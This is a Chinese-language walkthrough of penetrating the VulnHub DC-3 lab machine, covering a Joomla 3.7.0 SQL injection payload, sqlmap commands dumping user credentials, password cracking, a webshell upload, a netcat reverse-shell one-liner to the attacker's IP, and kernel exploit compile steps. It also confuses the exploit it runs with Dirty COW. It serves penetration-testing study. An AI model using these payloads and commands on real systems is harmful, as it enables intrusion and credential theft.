[VulnHub]DC3渗透记录
2022-5-18 22:7:21 Author: www.freebuf.com(查看原文) 阅读量:9 收藏

靶机信息

kali:192.168.123.73
靶机:192.168.123.144

信息收集

nmap收集信息

<a href="https://imgtg.com/image/b3KYX"><img src="https://i.imgtg.com/2022/03/31/b3KYX.png" alt="b3KYX.png" border="0"></a>

收集到80端口

访问80端口

<a href="https://imgtg.com/image/b3v5t"><img src="https://i.imgtg.com/2022/03/31/b3v5t.png" alt="b3v5t.png" border="0"></a>
wappalyzer显示的管理系统为Joomla

Joomla检测器

根据DC2,Joomla也应该存在检测器

git clone https://github.com/rezasp/joomscan.git

cd joomscan

perl joomscan.pl

显示该页面表示joom下载正确

<a href="https://imgtg.com/image/b3yKx"><img src="https://i.imgtg.com/2022/03/31/b3yKx.png" alt="b3yKx.png" border="0"></a>

使用joomscan扫描DC3网站,返回信息

目录遍历

<a href="https://imgtg.com/image/b3gSj"><img src="https://i.imgtg.com/2022/03/31/b3gSj.png" alt="b3gSj.png" border="0"></a>

管理员后台

<a href="https://imgtg.com/image/b3mwp"><img src="https://i.imgtg.com/2022/03/31/b3mwp.png" alt="b3mwp.png" border="0"></a>

Joomla版本信息

<a href="https://imgtg.com/image/b3J1U"><img src="https://i.imgtg.com/2022/03/31/b3J1U.png" alt="b3J1U.png" border="0"></a>

渗透过程

SQL注入漏洞

百度搜到joomla的3.7.0的SQL漏洞(CVE-2017-8917)

Payload:http://192.168.123.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)

通过searchsploit joomla 3.7.0

<a href="https://imgtg.com/image/b3PDY"><img src="https://i.imgtg.com/2022/03/31/b3PDY.png" alt="b3PDY.png" border="0"></a>

查看对应的漏洞信息

cat /usr/share/exploitdb/exploits/php/webapps/42033.txt

<a href="https://imgtg.com/image/b3R8v"><img src="https://i.imgtg.com/2022/03/31/b3R8v.png" alt="b3R8v.png" border="0"></a>

爆库: sqlmap -u "http://192.168.123.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

<a href="https://imgtg.com/image/b34xq"><img src="https://i.imgtg.com/2022/03/31/b34xq.png" alt="b34xq.png" border="0"></a>

存在information_schema、joomladb、mysql等等库。

盲注、报错注入、延时注入

爆表: sqlmap -u "http://192.168.123.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D 'joomladb' --tables -p list[fullordering]

<a href="https://imgtg.com/image/b3Dpc"><img src="https://i.imgtg.com/2022/03/31/b3Dpc.png" alt="b3Dpc.png" border="0"></a>

<a href="https://imgtg.com/image/b3Hfr"><img src="https://i.imgtg.com/2022/03/31/b3Hfr.png" alt="b3Hfr.png" border="0"></a>

爆字段

<a href="https://imgtg.com/image/b3EBM"><img src="https://i.imgtg.com/2022/03/31/b3EBM.png" alt="b3EBM.png" border="0"></a>

尝试获取字段username和password的内容

sqlmap -u "http://192.168.123.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C 'username,password' -dump -p list[fullordering]

<a href="https://imgtg.com/image/b3GKG"><img src="https://i.imgtg.com/2022/03/31/b3GKG.png" alt="b3GKG.png" border="0"></a>

john工具(密码解密)

这里将加密的密码保存为一个文本

john命令参数

--single single crack 模式,使用配置文件中的规则进行破

--wordlist=FILE--stdin 字典模式,从 FILE 或标准输入中读取词汇

--show 显示已破解口令

<a href="https://imgtg.com/image/b3Q01"><img src="https://i.imgtg.com/2022/03/31/b3Q01.png" alt="b3Q01.png" border="0"></a>

<a href="https://imgtg.com/image/b3SwI"><img src="https://i.imgtg.com/2022/03/31/b3SwI.png" alt="b3SwI.png" border="0"></a>

Webshell上传

网站的template栏中发现可以写文件和上传文件,且目录遍历那块可以查看。尝试写一句话上去。

<a href="https://imgtg.com/image/b3c1D"><img src="https://i.imgtg.com/2022/03/31/b3c1D.png" alt="b3c1D.png" border="0"></a>

<a href="https://imgtg.com/image/b3dHF"><img src="https://i.imgtg.com/2022/03/31/b3dHF.png" alt="b3dHF.png" border="0"></a>

在New File一个新文件在html里面

<a href="https://imgtg.com/image/b3s86"><img src="https://i.imgtg.com/2022/03/31/b3s86.png" alt="b3s86.png" border="0"></a>

写入文件,之前在目录遍历里面查看chen.php

<a href="https://imgtg.com/image/b3YxP"><img src="https://i.imgtg.com/2022/03/31/b3YxP.png" alt="b3YxP.png" border="0"></a>

蚁剑连接

<a href="https://imgtg.com/image/b3fJb"><img src="https://i.imgtg.com/2022/03/31/b3fJb.png" alt="b3fJb.png" border="0"></a>

方便使用,在攻击机上监听端口,蚁剑反弹shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.123.73 8888 >/tmp/f

<a href="https://imgtg.com/image/b3lfl"><img src="https://i.imgtg.com/2022/03/31/b3lfl.png" alt="b3lfl.png" border="0"></a>

脏牛提权

文件不能用了,把原理和步骤了解一遍

危害:低权限的用户利用漏洞在本地进行提权

原理:Linux内核的子系统在处理写入时复制至产生了竞争条件, 恶意用户可利用此漏洞来获取高权限,对只读内存映射进行访问。

竞争条件:任务条件异常,导致应用崩溃,攻击者执行命令,在目标机器提权。

内核提权,通过查找服务器漏洞得到exp文件,运行提权文件

确定服务器版本

<a href="https://imgtg.com/image/b3jBg"><img src="https://i.imgtg.com/2022/03/31/b3jBg.png" alt="b3jBg.png" border="0"></a>

Ubuntu版本为16.04

searchsploit ubuntu 16.04

<a href="https://imgtg.com/image/b32ZB"><img src="https://i.imgtg.com/2022/03/31/b32ZB.png" alt="b32ZB.png" border="0"></a>

<a href="https://imgtg.com/image/b360s"><img src="https://i.imgtg.com/2022/03/31/b360s.png" alt="b360s.png" border="0"></a>

tar -xvf exploit.tar#解压文件

cd ebpf_mapfd_doubleput_exploit/  #进入目录

chmod +x compile.sh #授权

./compile.sh#执行脚本

./doubleput #执行提权脚本

等待root权限shell

总结

脏牛提权和不同方法反弹shell

<a href="https://imgtg.com/image/b3XMK"><img src="https://i.imgtg.com/2022/03/31/b3XMK.png" alt="b3XMK.png" border="0"></a>

链接

反弹Shell


文章来源: https://www.freebuf.com/articles/web/326933.html
如有侵权请联系:admin#unsafe.sh